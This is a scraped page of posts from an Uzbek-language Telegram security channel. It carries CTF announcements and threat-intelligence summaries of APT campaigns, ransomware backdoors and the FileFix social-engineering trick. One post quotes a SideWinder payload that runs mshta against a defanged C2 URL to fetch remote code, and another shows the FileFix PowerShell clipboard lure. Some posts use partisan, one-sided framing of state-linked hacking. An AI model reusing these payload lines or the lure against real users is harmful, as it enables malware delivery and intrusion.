CentiSec
841 subscribers
125 photos
3 videos
1 file
95 links
Biz shunchaki o'rganuvchilarmiz.

Forum — https://t.me/+XfDNbo3_oLZhYTY8

@centihack
Download Telegram
photo_2025-02-19_08-47-19.jpg
259.2 KB
#️⃣ #CentiCTF

Task: 🌐OSINT

Javob shakli:

Mobil qurilma:
Latitude (kenglik)
longitude (uzunlik)

Radius (100 metr) farq qilishi mumkin

➡️Javobini @CentiSecadmin

Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
22👍4
#️⃣ #CentiNews

🥷\UAC-0212 guruhi Ukraina infrastrukturasi obyektlariga kiberhujumlarni amalga oshirish maqsadida avtomatlashtirish va texnologik jarayonlarni boshqarish yechimlarini ishlab chiquvchilar hamda yetkazib beruvchilarga qaratilgan faoliyatini olib bormoqda.

2024-yilning ikkinchi yarmidan boshlab, yangi taktikalar, texnikalar va protseduralar kuzatilmoqda. Jumladan, jabrlanuvchiga PDF hujjati yuborilib, ushbu hujjatda keltirilgan havolaga bosish orqali CVE-2024-38213 zaifligidan foydalanish natijasida tizimga "pdf.lnk" kengaytmali LNK fayli yuklab olinadi. Ushbu fayl ishga tushirilganda, PowerShell buyrug‘ini bajarish orqali qurbonning kompyuteriga zararli hujjat yuklab va ko‘rsatiladi, shuningdek EXE/DLL fayllarni yuklash, ularning doimiyligini ta’minlash (Windows "Run" bo‘limi orqali) va ishga tushirish amalga oshiriladi.

Ma’lumki, ushbu kiber tahdidni amalga oshirishda quyidagi dasturiy vositalar ishlatilgan: SECONDBEST / EMPIREPAST, SPARK, CROOKBAG (GoLang yuklovchi). Shu bilan birga, ayrim holatlarda hujjatlarni uzoq muddat davomida o‘g‘irlash uchun RSYNC ham ishlatilgan.


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍2
#️⃣ Google, Meta va Apple 3 millionga yaqin foydalanuvchilarning ma’lumotlarini Amerikaga yetkazib kelyapti

— Proton bergan ma’lumotiga ko’ra, texnik gigantlar, ya’ni Google, Meta va Apple Amerikaning maxsus bo’linmalari va havfsizlik bo’linmalari uchun ma’lumotlar yetkazuvchi sifatida gavdalandi.

💬 Oxirgi 12 oy davomida amerikalik bo’linmalar 500 minga yaqin Google va Meta kompaniyalariga so’rov yuborgan.

Bu shuni anglatadiki Amerika yirik bo’lgan IT gigantlarini kuzatuv uchun foydalanib kelayapti.

Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍2
#️⃣ #CentiNews

🔵Bugun CentiSec kichik CTF musobaqasini o‘tkazadi. Imkoniyatingizni sinab ko‘ring!

💬 Shartlar oddiy:
Berilgan vazifani yechib, 1 TON mukofotga ega bo‘ling.

CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍6
👽 SideWinder yangilangan qurollanish asboblar to'plami bilan dengiz va yadro sektorlariga mo'ljallangan

APT guruhi turli sohalarga katta qiziqish uyg'otadi va hujumlarning katta geografiyasi bilan tanishing:

Guruh o'z faoliyatini, ayniqsa Afrikada yanada kengaytirdi. Hujumlar Avstriya, Bangladesh, Kambodja, Jibuti, Misr, Indoneziya, Mozambik, Myanma, Nepal, Pokiston, Filippin, Shri-Lanka, Birlashgan Arab Amirliklari va Vetnamda aniqlangan.
So‘nggi hujumlarda SideWinder Afg‘oniston, Jazoir, Bolgariya, Xitoy, Hindiston, Maldiv orollari, Ruanda, Saudiya Arabistoni, Turkiya va Ugandadagi diplomatik vakolatxonalarni ham nishonga oldi.

🤛Dastlabki infektsiya, har doimgidek, eng samarali - eski Microsoft Office zaifligidan foydalanish, CVE-2017-1188

Zararli ilovali fishing xabari > RTF ekspluatatsiyasi >
javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe)
hxxps://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();")


Ko'rib turganimizdek, mshta ishga tushirildi, u C2 dan hta faylini yuklashi kerak, keyin qonuniy jarayon bilan yuklangan Backdoor Loader kutubxonasi yuklanadi.
Hujum quyidagi nomlarga ega edi:

propsys.dll
vsstrace.dll
JetCfg.dll
Policymanager.dll
winmm.dll
xmllite.dll
dcntele.dll
UxTheme.dll


Bu kutubxona Stealer Bot implantini xotiraga yuklash uchun kerak.

🔗 Source.

Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
1012👍7
👽 RevivalStone:

— Winnti guruhining Yaponiya tashkilotiga qaratilgan hujum kampaniyasi

Qurollanish:

WebShell:
- China chopper
- Behinder (Ice Scorpion)
- sqlmap file uploader
Winnti zararli dasturlari (Rootkit, RAT, Loader)


Asosiy fikrlar:

- Dastlabki kirish: "China Chopper" va "Behinder" kabi veb-qobiqlarni joylashtirish uchun Enterprise Resource Planning (ERP) tizimlarida SQL injection zaifliklaridan foydalanish, dastlabki kirish va razvedkani osonlashtiradi.

- Zararli dasturlarni joylashtirish: xavfsizlik mahsulotlarini chetlab o'tish uchun noaniqlik, yangilangan shifrlash algoritmlari va ilg'or qochish usullarini o'z ichiga olgan Winnti zararli dasturining takomillashtirilgan versiyasini o'rnatish.

- Yanal harakat: bir nechta tashkilotlarga ta'sir qiladigan o'zaro bog'langan tarmoqlar bo'ylab zararli dasturlarni tarqatish uchun, xususan, boshqariladigan xizmat ko'rsatuvchi provayderlar (MSP) ichida buzilgan umumiy hisoblardan foydalanish:


🔗 Source.

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
109👍5
Hujumchilar Yangi Maxsus Backdoor-dan Foydalanmoqda 👽

RansomHub:

Symantec
tadqiqotchilari aniqlashicha, RansomHub RaaS dasturining kamida bitta affillangan ishtirokchisi Betruger nomli yangi backdoor-dan foydalanishni boshlagan. Ushbu ko‘p funksiyali zararli dastur ehtimoliy ravishda to‘lov talab qiluvchi hujumlar uchun maxsus ishlab chiqilgan.

Betruger funksiyalari:

⚪️ Ekran skrinshotlarini olish
⚪️ Keylogging (klaviatura yozuvlarini qayd etish)
⚪️ Fayllarni boshqaruv serveriga yuklash
⚪️ Tarmoqni skanerlash
⚪️ Huquqlarni oshirish (privilege escalation)
⚪️ Akkount ma’lumotlarini o‘g‘irlash


Backdoor fayllari mailer.exe va turbomailer.exe nomlari ostida bo‘lib, ular qonuniy dasturlar sifatida yashirishga urinish bo‘lishi mumkin.

🔗 Source.

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
1015👍5
CentiSec jamoasi barchani va shu jumladan vatandoshlarimizga chin qalbidan ramazon hayitini muborakbod etadi!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
122👍9
#️⃣ #CentiMachine

Machine haqida batafsil ma'lumot olmoqchi bo'lsangiz:

🔗 app.centisec.uz

Musobaqa 3-Iyun soat 18:00-dan ertangi 4-Iyun soat 18:00-gacha davom etadi, barchangizga omad!

Forumga qo'shiling — Forum

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍55
#️⃣ #CentiMachine

Machine haqida batafsil ma'lumot olmoqchi bo'lsangiz:

🔗 app.centisec.uz

Musobaqa 10-iyun soat 17:00-dan ertangi 11-iyun soat 17:00-gacha bo'lib o'tadi, barchangizga omad!

Forumga qo'shiling — Forum

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍3
This media is not supported in your browser
VIEW IN TELEGRAM
👽HANDALA Eron patriot xakkerlari bosqinchi Isroil tomonga qarshi zarbalar

Ohirgi xabarlarga ko'ra Eron patriot xakkerlik guruhlari o'z aktivlarini boshlaganini e'lon qilishdi, va ularga shu bilan birga dunyoning har bir chekkasidan xakkerlar qo'shilib ularga yordam berish uchun shay turishganini e'lon qildi.

🇮🇷 Eron patriot xakkerlik guruhlari kiber makonda alohida o'ringa ega, asosan yaqin Sharqdagi urushga ham Eron xakkerlari o'z pozitsiyalarini e'lon qilib kelishgan, hozirga kelib ushbu guruhlar ancha yig'ilib aktiv tarzda amaliyotlar olib borishmoqda.

Yaqin orada Pokiston va Hindiston kichik vaqt "davom etgan urushiga" ham har tomondan xakkerlik guruhlari yig'ilgani ammo asosan Hindiston ochiqchasiga katta kompaniyalarda ishlaydigan kiberxavfsizlik muhandislarini ham ushbu amaliyotga tortganligi va haligacha ushbu amaliyotlar davom etayotganligi ma'lum

🔊 HANDALA xakkerlik guruhi da'vo qilishicha Isroil gaz sistemalarga zarar bergan.
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1010
Nega Eron internetni o‘chirib qo‘ydi

🕹 Isroil Eronga qarshi moliyaviy infratuzilmasiga kuchli kiberhujumlar uyushtirdi. Javoban Eron dezinformatsiya kampaniyalari va psixologik urush orqali hujumlarga qarshi turishga urindi. Bu hodisadan so‘ng xaktivistlar faolligi oshdi, ularning aksariyat harakatlari Eron foydasiga yo‘naltirilgan edi. Sun’iy intellekt yordamida yaratilgan media vositalari orqali olib borilayotgan dezinformatsiya harakatlari onlayn voqelikni shakllantirish va buzishda davom etmoqda.


Isroillik Gonjeshke Darande (fors tilidan tarjimada “Yirtqich chumchuq”) xakerlar guruhi Erondagi davlatga qarashli Sepah bankiga kirib borib, uning ma’lumotlarini yo‘q qilganini e’lon qildi. Ushbu hujum natijasida xizmatlarda keng ko‘lamli uzilishlar yuz berdi.

👽 Eronning Islomiy inqilob soqchilari korpusi (IRGC) tarkibiga kiruvchi APT34 (OilRig), APT35 (Charming Kitten), APT39 (Remix Kitten) kabi guruhlar Isroil infratuzilmasiga — suv ta’minoti tizimlari, transport tugunlari, hatto kuzatuv tarmoqlariga ham zarbalar berdi.

AQShga qarshi esa “Janob Hamza”, “Arab arvohlari”, “Noma’lum kiber jamoa”, “Dinet”, “Elita otryadi”, “Marokashning qora kiberarmiyasi” va “Bangladeshning sirli jamoasi” tomonidan hujumlar uyushtirildi. Ushbu guruhlar xuddi shu davrda Isroilga qarshi ham chiqishgan.


Keymous+ va Mysterious Team Bangladesh asosan o‘z kiberoperatsiyalarini Misrga yo‘naltirgan, biroq ikkala guruh ham Isroil tashkilotlariga qarshi hujumlar uchun javobgarlikni o‘z zimmasiga olgan.

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
22👍3
🗂 FileFix — ClickFix’ning yangi ko‘rinishi, endi “Проводник” orqali

🧠 Tadqiqotchi mrd0x yangi ijtimoiy muhandislik usulini aniqladi — FileFix.

Bu usul ham ilgari mashhur bo‘lgan ClickFix kabi foydalanuvchini o‘zi zararli kodni ishga tushirishga undaydi. Farqi shundaki, bu safar Win+R oynasi emas, balki Explorer (Проводник) manzil satri ishlatiladi.

🔵 FileFix qanday ishlaydi:

Qurbon maxsus tayyorlangan fishing (firibgarlik) saytga kiradi. U saytda ichki korporativ portal ko‘rinishi berilgan bo‘ladi. Sayt foydalanuvchiga "hujjatni ochish"ni taklif qiladi va quyidagi "yo‘l"ni nusxalashni so‘raydi:

C:\Company\internal-secure\HRPolicy.docx

Aslida esa, bu "yo‘l" emas — quyidagi zararli PowerShell buyrug‘i clipboard’ga (buferga) nusxalanadi:

powershell.exe -c ping example.com # C:\company\internal-secure\HRPolicy.docx

Foydalanuvchiga quyidagi ko‘rsatma beriladi:
Ctrl+L → Ctrl+V → Enter — bularning barchasi Explorer’ning manzil satrida amalga oshiriladi.

Natijada foydalanuvchi hech narsadan shubhalanmasdan Enter tugmasini bosadi va real hujjat ochilmaydi — balki PowerShell komandasi ishga tushadi! Bu esa — bevosita brauzer orqali zararli kodni ishga tushirish degani.


🚫 Nega bu usul xavfli:

Explorer (Проводник) manzil satrida yozilgan komandalar filtrlanmaydi

Windows interfeysi foydalanuvchida shubha uyg‘otmaydi — odatiy ish jarayoni kabi ko‘rinadi

Foydalanuvchi fayl ochaman deb o‘ylaydi, aslida esa zararli kod ishga tushadi.


Hech qanday fayl yuklanmaydi (.exe yoki .lnk) — faqat clipboard orqali ish yuritiladi

🛡 Qanday himoyalanish kerak:

Brauzer.exe → powershell.exe kabi jarayon zanjirlarini kuzatadigan xavfsizlik tizimlaridan foydalaning

Xodimlarga tushuntiring: har qanday “qo‘lda tuzatish”, “hujjat ochish” yoki “sistemani sozlash” talab qiladigan ko‘rsatmalar — potensial xavf

EDR tizimlarini yoqing va Проводник hamda clipboard harakatlarini log qilib boring


✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
114
👽 IntelBroker — kiberjinoyat forumlarida (xususan BreachForumsda) faol bo‘lgan mashhur xaker.

U ko‘plab mashhur ma’lumotlar sizib chiqishiga sababchi bo‘lgan va odatda AQSh hukumati yoki yirik korporatsiyalarni nishonga olgan.

🔥 Asosiy faoliyatlari va hujumlari:

1. AQSh hukumatiga oid ma’lumotlar sizib chiqishi

FBI InfraGard (2022): FBI InfraGard a’zolari (xavfsizlik sohasidagi hamkorlik tarmog‘i) haqida shaxsiy ma’lumotlar (ism, telefon, email) e’lon qilingan. U bu tarmoqqa soxta akkaunt orqali kirgan.

DC Health Link (2023): AQSh Kongressi xodimlarining sog‘liqni sug‘urtasi bo‘yicha ma’lumotlari sizib chiqqan. Taxminan 56,000 kishining ma’lumotlari zarar ko‘rgan.

2. Five Eyes razvedkasi bilan bog‘liq hujum

AQSh va uning ittifoqchilari (UK, Kanada, Avstraliya, Yangi Zelandiya) o‘rtasida almashiladigan maxfiy razvedka hujjatlarini qo‘lga kiritganini da’vo qilgan.

Harbiy loyihalar, xavfsizlik strategiyalari kabi maxfiy hujjatlar tarqatilgan.

3. Apple va Qualcomm maxfiy hujjatlari (2023–2024)

Apple ichki kodlari va Qualcomm’ga tegishli texnik hujjatlar, firmware fayllarini sizdirganini da’vo qilgan.

4. General Electric (GE) hujjatlari (2023)

GE’ning AQSh harbiy loyihalari bilan bog‘liq ichki hujjatlari va parollari tarqatilgan.

5. Shuningdek boshqa kompaniyalar ham.


AMD, T-Mobile, Weee!, va Pfizer kabi yirik firmalarning ichki ma’lumotlari, xodimlar parollari, mahsulotga oid sirlar haqida postlar joylashtirgan.

💻 Taktikalari va uslubi:

Forumlar faoliyati: BreachForums va boshqa "dark web" forumlarda faol.

Ijtimoiy muhandislik: Soxta ishchi yoki sherik sifatida kirib ma’lumotlarga ega bo‘lgan.

Ma’lumotlarni sotish yoki bepul tarqatish: Ba’zida diqqatni jalb qilish uchun bepul tarqatadi, ba’zida esa kriptovalyuta evaziga sotadi.

Siyosiy yo‘nalish: Ko‘p hollarda AQSh yoki G‘arb davlatlariga qarshi siyosiy izohlar bilan chiqadi.

Xavfsizlikni ta’minlash: Doimiy laqab almashadi, iz qoldirmaslikka harakat qiladi.

🦅 Hozirda unga qarshi tergov ishlari olib borilmoqda va AQSh-da qo’lga olingan.

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
18